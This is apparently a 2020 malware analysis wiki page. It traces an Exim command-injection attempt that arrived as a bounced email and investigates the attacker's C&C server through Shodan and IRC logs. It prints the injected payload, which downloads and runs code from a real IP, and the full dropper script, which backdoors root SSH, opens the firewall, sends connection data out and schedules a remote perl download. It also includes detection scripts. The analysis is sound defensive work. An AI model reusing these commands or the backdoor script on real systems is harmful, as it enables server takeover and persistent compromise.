Revision 9 as of 2020-04-04 10:22:51


Malware analysis

Initial infection

It started this morning: I received a bounce from my mail server saying it could not deliver an email. The message itself looked ordinary, but the recipient address was what caught my attention: the local part contained a command injection. After some searching on the internet I concluded this is probably an old vulnerability in Exim that makes this possible. Let's take a look at the address.

<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2045.148.10.84\x2fss\x20-Osxs\x3bchmod\x20\x2bx\x20sxs\x3b.\x2fsxs\x22}}@gnr01.servers.sciuro.org>

Replacing every "\x" with "%" lets the local part be run through a URL decoder; after fixing up the remaining escapes (the "\t" tabs) I ended up with the following command. We have a C&C server: 45.148.10.84

/bin/sh -c "wget 45.148.10.84/ss -Osxs;chmod +x sxs;./sxs"
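The decoding step above can be automated. The script below is an added example (not part of the original write-up) that pulls the argument of the ${run{...}} expansion out of the local part, converts the \xNN and \t escapes back into characters, and lists the URLs the resulting command fetches. The recipient address is copied from the bounce shown above; the function names are my own.

```python
import re
from typing import List, Optional

# The malformed recipient address exactly as it appeared in the bounce (raw string, so
# the backslashes are kept as literal characters, just like in the mail header).
BOUNCED_RECIPIENT = (
    r"root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2045.148.10.84\x2fss\x20-Osxs\x3bchmod"
    r"\x20\x2bx\x20sxs\x3b.\x2fsxs\x22}}@gnr01.servers.sciuro.org"
)


def decode_escapes(s: str) -> str:
    """Turn the \\t and \\xNN escapes used in the local part back into characters."""
    s = s.replace(r"\t", "\t")
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def extract_run_command(address: str) -> Optional[str]:
    """Return the decoded argument of a ${run{...}} expansion in the local part, or None.

    Tabs are normalised to single spaces so the result reads like a shell command line;
    a plain address without the expansion yields None.
    """
    local_part = address.rsplit("@", 1)[0]
    match = re.search(r"\$\{run\{(.*)\}\}", local_part)
    if not match:
        return None
    return decode_escapes(match.group(1)).replace("\t", " ")


def fetched_urls(command: str) -> List[str]:
    """Every argument handed to wget in the decoded command; these are the download IoCs."""
    return re.findall(r"wget\s+(\S+)", command)


if __name__ == "__main__":
    cmd = extract_run_command(BOUNCED_RECIPIENT)
    print("decoded command:", cmd)
    print("downloads from :", fetched_urls(cmd or ""))
```

The same decoder works on any address whose local part carries this kind of escaped ${run{...}} payload, so it can be dropped into a log-parsing pipeline that watches bounce notifications for further attempts.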

Initial malware

The ss executable contains the following code:

#!/bin/bash
exists=$(grep -c "^jkl:" /etc/passwd)
if [ $exists -eq 0 ]; then
chattr -isa /root/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh139jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/KCvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2lFmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ root@' >/root/.ssh/authorized_keys
/usr/sbin/sshd -p 322
/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/sbin/iptables-save >/dev/null 2>&1
/usr/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/usr/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/usr/sbin/iptables-save >/dev/null 2>&1
data2=`netstat -natp |grep sshd|base64`
wget -q --post-data "DATA=dGlua2QK&DATA2=$data2" 45.148.10.84/.z/p.php -O /dev/null
cd /tmp
echo 'cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png' > twink
echo 'crontab -l|grep -v twink > /tmp/mycron;crontab /tmp/mycron;rm -fr /tmp/twink' >> twink
echo '* * * * * /tmp/twink' >mycron
crontab -l >> mycron
chmod +x /tmp/twink
crontab mycron;rm -fr mycron
else
exit
fi

This script does the following:

  1. Checks whether the user "jkl" exists. If so, stop executing the script.
  2. Adds a public SSH key for the root user.
  3. Starts an SSH server listening on port 322.
  4. Opens the firewall for incoming and outgoing connections on port 322 and saves the rules so they survive a reboot.
  5. Lists the current sshd connections and listening ports (netstat -natp) and sends them, base64-encoded, in a POST request back to the C&C server.
  6. Writes a script /tmp/twink that downloads r.png, runs it through perl, and deletes the file again.
  7. Puts /tmp/twink in the crontab to run every minute; on its first run the script also removes its own crontab entry and deletes itself.
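The steps above leave three host artefacts a responder can check for: a cron job running out of /tmp, an extra key in root's authorized_keys, and a second sshd listening on port 322. The script below is an added example, not code from the write-up, that runs those checks over collected crontab, authorized_keys and netstat output. The sample inputs are constructed for the example (the key blobs are dummy base64, not the real key from the dropper) and the function names are my own.

```python
import base64
import hashlib
from typing import Dict, List, Set

# Indicators taken from the dropper script: an extra sshd on 322 and a cron job in /tmp.
SSHD_EXPECTED_PORTS = {22}

# Constructed sample artefacts (not real captures), shaped like what a responder would
# collect with "crontab -l", "cat /root/.ssh/authorized_keys" and "netstat -natp".
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /tmp/twink
"""

KNOWN_KEY_BLOB = base64.b64encode(b"constructed admin key material").decode()
ROGUE_KEY_BLOB = base64.b64encode(b"constructed attacker key material").decode()
SAMPLE_AUTHORIZED_KEYS = f"""\
ssh-rsa {KNOWN_KEY_BLOB} admin@bastion
ssh-rsa {ROGUE_KEY_BLOB} root@
"""

SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:322             0.0.0.0:*               LISTEN      4411/sshd
tcp        0      0 10.0.0.5:22             10.0.0.9:51322          ESTABLISHED 2311/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      901/httpd
"""


def cron_jobs_in_tmp(crontab_text: str) -> List[str]:
    """Crontab lines whose command runs from /tmp or /var/tmp (the dropper schedules /tmp/twink)."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) == 6 and fields[5].startswith(("/tmp/", "/var/tmp/")):
            hits.append(line)
    return hits


def key_fingerprint(blob: str) -> str:
    """OpenSSH-style SHA256 fingerprint (base64 without padding) of a key blob."""
    digest = hashlib.sha256(base64.b64decode(blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def unknown_authorized_keys(authorized_keys_text: str, allowed_blobs: Set[str]) -> List[str]:
    """Fingerprint and comment of every key not on the allow-list (the dropper's key ends in 'root@')."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or line.startswith("#"):
            continue
        blob = parts[1]  # parts[0] is the key type; option-prefixed lines are not handled here
        if blob not in allowed_blobs:
            comment = " ".join(parts[2:]) or "(no comment)"
            unknown.append(f"{key_fingerprint(blob)} {comment}")
    return unknown


def sshd_on_unexpected_ports(netstat_text: str, expected: Set[int] = SSHD_EXPECTED_PORTS) -> List[int]:
    """Ports where an sshd process is LISTENing apart from the expected ones (the dropper uses -p 322)."""
    ports = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0] not in ("tcp", "tcp6") or fields[5] != "LISTEN":
            continue
        if not fields[6].endswith("/sshd"):
            continue
        port = int(fields[3].rsplit(":", 1)[1])  # works for 0.0.0.0:322 and :::322 alike
        if port not in expected:
            ports.add(port)
    return sorted(ports)


def triage(crontab_text: str, authorized_keys_text: str, netstat_text: str,
           allowed_blobs: Set[str]) -> Dict[str, list]:
    """Run all three checks; an empty list means that check found nothing."""
    return {
        "cron_jobs_in_tmp": cron_jobs_in_tmp(crontab_text),
        "unknown_authorized_keys": unknown_authorized_keys(authorized_keys_text, allowed_blobs),
        "sshd_unexpected_ports": sshd_on_unexpected_ports(netstat_text),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_CRONTAB, SAMPLE_AUTHORIZED_KEYS, SAMPLE_NETSTAT, {KNOWN_KEY_BLOB})
    for check, findings in report.items():
        print(f"{check}: {findings if findings else 'clean'}")
```

Because the dropper's cron job deletes itself after its first run, the crontab check may already come back clean on a box that was hit hours ago; the authorized_keys entry and the sshd on port 322 persist and are the more reliable indicators.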

IP research

Shodan

    22
    tcp
    ssh
    OpenSSHVersion: 5.3

    SSH-2.0-OpenSSH_5.3
    Key type: ssh-rsa
    Key: AAAAB3NzaC1yc2EAAAABIwAAAQEAvyWZgWstpcVr2blRlY/abtcMf0HAHITFE2ZPjZdu9ikzFFtf
    AgJrdqEX1JoLXvXH+KpE9GYw+4H+J5/qVaBOmMUsCCZmZBdSgI5Va5ZXD2CcZD95JvpbB7w7Zr0Z
    8M32GUPZrrnZY29ZSE0ZeMW6CvcXRH2rU+kEy8cHBaXZjPt6Ng3WXJR1JvVjqPeHQneyOtnw/pGZ
    Yxxwyt8xa9ySoKN0dJOCJBKUhjtXmfH0OLHk9eUQUJ0A5r9F8qCW3JEZcPapfNTITF9rA3f57THC
    +JuoTNxJgS883m/ljcWZJEeWi9IluUMb5ZDDSh+/EVlfhGHOUC6PJ6n8NHE/TrXqwQ==
    Fingerprint: 91:18:7e:69:82:5f:86:6a:ed:a0:1c:c6:38:a7:4a:6c

    Kex Algorithms:
        diffie-hellman-group-exchange-sha256
        diffie-hellman-group-exchange-sha1
        diffie-hellman-group14-sha1
        diffie-hellman-group1-sha1

    Server Host Key Algorithms:
        ssh-rsa
        ssh-dss

    Encryption Algorithms:
        aes128-ctr
        aes192-ctr
        aes256-ctr
        arcfour256
        arcfour128
        aes128-cbc
        3des-cbc
        blowfish-cbc
        cast128-cbc
        aes192-cbc
        aes256-cbc
        arcfour
        rijndael-cbc@lysator.liu.se

    MAC Algorithms:
        hmac-md5
        hmac-sha1
        umac-64@openssh.com
        hmac-sha2-256
        hmac-sha2-512
        hmac-ripemd160
        hmac-ripemd160@openssh.com
        hmac-sha1-96
        hmac-md5-96

    Compression Algorithms:
        none
        zlib@openssh.com

    80
    tcp
    http
    Apache httpdVersion: 2.2.15

    HTTP/1.1 403 Forbidden
    Date: Sun, 29 Mar 2020 01:37:10 GMT
    Server: Apache/2.2.15 (CentOS)
    Accept-Ranges: bytes
    Content-Length: 4961
    Connection: close
    Content-Type: text/html; charset=UTF-8

    5432
    tcp
    postgresql
    PostgreSQL

    PostgreSQL
    received invalid response to SSL negotiation: :

    8080
    tcp
    http
    Unreal ircd

    :irc.evilcode.php NOTICE AUTH :*** Looking up your hostname...
    :irc.evilcode.php NOTICE AUTH :*** Found your hostname (cached)
    ERROR :Closing Link: [180.25.78.224] (HTTP command from IRC connection (ATTACK?))

    9999
    tcp
    telnet
    Unreal ircd

    :irc.evilcode.php NOTICE AUTH :*** Looking up your hostname...
    :irc.evilcode.php NOTICE AUTH :*** Found your hostname

Servers

IRCD server

[09:08:24] Connecting to [45.148.10.84] on port 8080
[09:08:24] Connection to host established
[09:08:25] -irc.evilcode.php-   *** Looking up your hostname...
[09:08:25] -irc.evilcode.php-   *** Couldn't resolve your hostname; using your IP address instead
[09:08:25] Welcome to the Don`t Use This ircd IRC Network Guest55!guest55@185.9.18.164
[09:08:25] Your host is irc.evilcode.php, running version Unreal3.2.10.6
[09:08:25] This server was created Sat Mar 7 2020 at 10:20:59 UTC
[09:08:25] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
[09:08:25] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server
[09:08:25] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server
[09:08:25] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server
[09:08:25] There are 1 users and 9 invisible on 1 servers
[09:08:25] 1 operator(s) online
[09:08:25] 4 channels formed
[09:08:25] I have 10 clients and 0 servers
[09:08:25] Current local users 10, max 232
[09:08:25] Current global users 10, max 232
[09:08:25] Message(422): MOTD File is missing
[09:08:25] Guest55 sets mode +iwx

The only channel listed is #R:

[09:12:07] Guest55 (guest55@2E03481B.742B81C2.C80A0F0D.IP) joined the channel
[09:12:07] Mode is +Mmnstu
[09:12:18] evil has userhost fld@mfu.txt and real name “.”
[09:12:18] evil is in @#R 
[09:12:18] evil is connected on irc.evilcode.php (Stay OUT BITCH!)
[09:12:18] evil is a Network Administrator
[09:12:18] evil is available for help.
[09:12:18] evil signed on at 31 March 2020 at 19:47:43 CEST and has been idle for 13 hours, 11 minutes, 35 seconds

[09:13:49] Connecting to [45.148.10.84] on port 9999
[09:13:49] Connection to host established
[09:13:49] -irc.evilcode.php-   *** Looking up your hostname...
[09:13:49] -irc.evilcode.php-   *** Couldn't resolve your hostname; using your IP address instead
[09:13:49] Welcome to the Don`t Use This ircd IRC Network Guest55!guest55@185.9.18.164
[09:13:49] Your host is irc.evilcode.php, running version Unreal3.2.10.6
[09:13:49] This server was created Sat Mar 7 2020 at 10:20:59 UTC
[09:13:49] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
[09:13:49] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server
[09:13:49] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server
[09:13:49] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server
[09:13:49] There are 1 users and 9 invisible on 1 servers
[09:13:49] 1 operator(s) online
[09:13:49] 1 unknown connection(s)
[09:13:49] 4 channels formed
[09:13:49] I have 10 clients and 0 servers
[09:13:49] Current local users 10, max 232
[09:13:49] Current global users 10, max 232
[09:13:49] Message(422): MOTD File is missing
[09:13:49] Guest55 sets mode +iwx